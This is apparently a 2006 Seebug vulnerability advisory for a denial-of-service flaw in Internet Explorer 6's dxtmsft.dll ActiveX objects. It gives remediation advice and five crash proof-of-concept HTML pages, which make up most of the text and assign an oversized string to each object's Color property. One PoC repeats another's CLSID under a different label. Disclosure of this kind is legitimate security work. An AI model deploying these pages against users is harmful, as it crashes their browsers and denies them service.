Microsoft IE dxtmsft.dll Multiple ActiveX COM Object DoS

2006-12-08T00:00:00
ID SSV:753
Type seebug
Reporter Root
Modified 2006-12-08T00:00:00

Description

Microsoft Internet Explorer contains a flaw that may allow a remote denial of service. The issue is triggered when a user accesses a malicious web site that contains scripting code calling a number of ActiveX COM objects in the dxtmsft.dll library, and will result in loss of availability for the browser.

Internet Explorer 6 Upgrade to version 7 or higher, as it has been reported to fix this vulnerability. It is also possible to correct the flaw by implementing the following workaround(s): Disable scripting or ActiveX controls.

                                        
                                            
                                                //test on vmware xp sp2,IE 6
//crash poc1,IDXTMask
<html>
<object classid='clsid:ADC6CB86-424C-11D2-952A-00C04FA34F05' id='target' /></object>
<script language='javascript'>

var b = "AAAA";

while(b.length < 0x2000000)
{
b += b;
}
target.Color=b;

</script>
</html>

//crash poc2,DXTChroma
<html>
<object classid='clsid:421516C1-3CF8-11D2-952A-00C04FA34F05' id='target' /></object>
<script language='javascript'>

var b = "AAAA";

while(b.length < 0x2000000)
{
b += b;
}
target.Color=b;

</script>
</html>

//crash poc3,DXTGlow
<html>
<object classid='clsid:9F8E6421-3D9B-11D2-952A-00C04FA34F05' id='target' /></object>
<script language='javascript'>

var b = "AAAA";

while(b.length < 0x2000000)
{
b += b;
}
target.Color=b;

</script>
</html>

//crash poc4,IDXTDropShadow
<html>
<object classid='clsid:ADC6CB86-424C-11D2-952A-00C04FA34F05' id='target' /></object>
<script language='javascript'>

var b = "AAAA";

while(b.length < 0x2000000)
{
b += b;
}
target.Color=b;

</script>
</html>

//crash poc5,DXTShadow
<html>
<object classid='clsid:E71B4063-3E59-11D2-952A-00C04FA34F05' id='target' /></object>
<script language='javascript'>

var b = "AAAA";

while(b.length < 0x2000000)
{
b += b;
}
target.Color=b;

</script>
</html>